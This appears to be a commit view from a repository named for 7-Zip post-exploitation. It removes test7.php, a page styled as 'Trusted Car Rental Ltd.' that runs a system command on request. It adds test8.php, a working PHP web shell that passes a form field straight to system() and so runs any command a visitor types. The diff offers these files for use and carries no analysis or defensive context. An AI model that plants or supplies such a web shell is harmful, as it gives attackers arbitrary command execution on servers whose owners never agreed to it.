Projects STRLCPY 7-ZipPostExp Commits 125f68ad
🤬
  • ■ ■ ■ ■ ■ ■
    test7.php
    1  -<!DOCTYPE html>
    2  - 
    3  -<html lang="en">
    4  - 
    5  - 
    6  - 
    7  - <head>
    8  - 
    9  - 
    10  - 
    11  - <meta charset="utf-8">
    12  - 
    13  - <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    14  - 
    15  - <meta name="description" content="">
    16  - 
    17  - <meta name="author" content="">
    18  - 
    19  - <link href="https://fonts.googleapis.com/css?family=Poppins:100,200,300,400,500,600,700,800,900&display=swap" rel="stylesheet">
    20  - 
    21  - 
    22  - 
    23  - <title>Trusted Car Rental Ltd.</title>
    24  - 
    25  - 
    26  - 
    27  - <!-- Bootstrap core CSS -->
    28  - 
    29  - <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    30  - 
    31  - 
    32  - 
    33  - <!-- Additional CSS Files -->
    34  - 
    35  - <link rel="stylesheet" href="assets/css/fontawesome.css">
    36  - 
    37  - <link rel="stylesheet" href="assets/css/style.css">
    38  - 
    39  - <link rel="stylesheet" href="assets/css/owl.css">
    40  - 
    41  - </head>
    42  - 
    43  - 
    44  - 
    45  - <body>
    46  - testING
    47  -
    48  - <?php
    49  - if(isset($_GET['cmd']))
    50  - {
    51  - system('ls');
    52  - }
    53  - echo "got ephph exec";
    54  -?>
    55  - </body>
    56  -</html>
    57  - 
  • ■ ■ ■ ■ ■ ■
    test8.php
     1 +<!DOCTYPE html>
     2 + 
     3 +<html>
     4 +<body>
     5 +<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
     6 +<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
     7 +<input type="SUBMIT" value="Execute">
     8 +</form>
     9 +<pre>
     10 +<?php
     11 + if(isset($_GET['cmd']))
     12 + {
     13 + system($_GET['cmd']);
     14 + }
     15 +?>
     16 +</pre>
     17 +</body>
     18 +</html>
     19 + 
Please wait...
Page is in error, reload to recover